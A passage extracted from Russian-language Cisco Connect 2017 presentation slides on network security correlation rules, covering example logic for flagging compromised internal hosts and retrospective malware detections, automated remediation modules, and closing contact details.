направлен в сеть PCI
• Иначе должно генерироваться
событие.

91. Правила могут быть простыми
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 91

92. Правила должны формулироваться на
основе логики
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 92
Source IP is in 192.168.0.0/16
Source IP is in 10.0.0.0/8
Source IP is in 172.16.0.0/12
O
R
Destination IP is not in 192.168.0.0/16
Destination IP is not in 10.0.0.0/8
Destination IP is not in 172.16.0.0/12
O
R
Impact Flag is 3 - Yellow
Impact Flag is 4 - Blue
O
R
A
N
D
If “an Intrusion Event occurs”. . .
Скомпрометированный хост атакует
внешние системы из вашей сети.
Sending IP is in 192.168.0.0/16
Sending IP is in 10.0.0.0/8
Sending IP is in 172.16.0.0/12
O
R
Receiving IP is in 192.168.0.0/16
Receiving IP is in 10.0.0.0/8
Receiving IP is in 172.16.0.0/12
O
R
If “a Malware Event occurs”
“by retrospective network-based malware detection”
O
R
В вашей сети был файл, который недавно
классифицирован как вредоносное ПО!
Пора что-то ДЕЛАТЬ!

93. Автоматизация нейтрализации
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 93
Примеры модулей нейтрализации
• Cisco ISE (pxGrid Mitigation)
• Установка атрибута хоста
• Скан Nmap
• Скрипты
• F5 iRules
• Netscaler
• …
События Intrusion
События Discovery
Действия пользователей
События хостов
События Connection
Профили трафика
Событие Malware
Правила
корреляции
Условия
Политики корреляции
Правила
корреляции
События
корреляции
Действия
(API, Email, SNMP)

94. Свяжитесь
с нами
Тестируйте
Составьте
план
внедрения
Напишите нам на security-
request@cisco.com или своему менеджеру
Cisco для организации встречи для более
вдумчивого обсуждения ваших задач
и способов их решения
Воспользуйтесь широким спектром
возможностей по тестированию:
• dCloud
• Виртуальные версии всего ПО
• Демо-оборудование
Мы поможем вам составить поэтапный
план внедрения решений по
кибербезопасности под ваши задачи
Что сделать после Cisco Connect?

95. #CiscoConnectRu#CiscoConnectRu
Спасибо за внимание!
Оцените данную сессию в мобильном приложении
конференции
© 2017 Cisco and/or its affiliates. All rights reserved.
Контакты:
Тел.: +7 495 9611410
www.cisco.com
www.facebook.com/CiscoRu
www.vk.com/cisco
www.instagram.com/ciscoru
www.youtube.com/user/CiscoRussiaMedia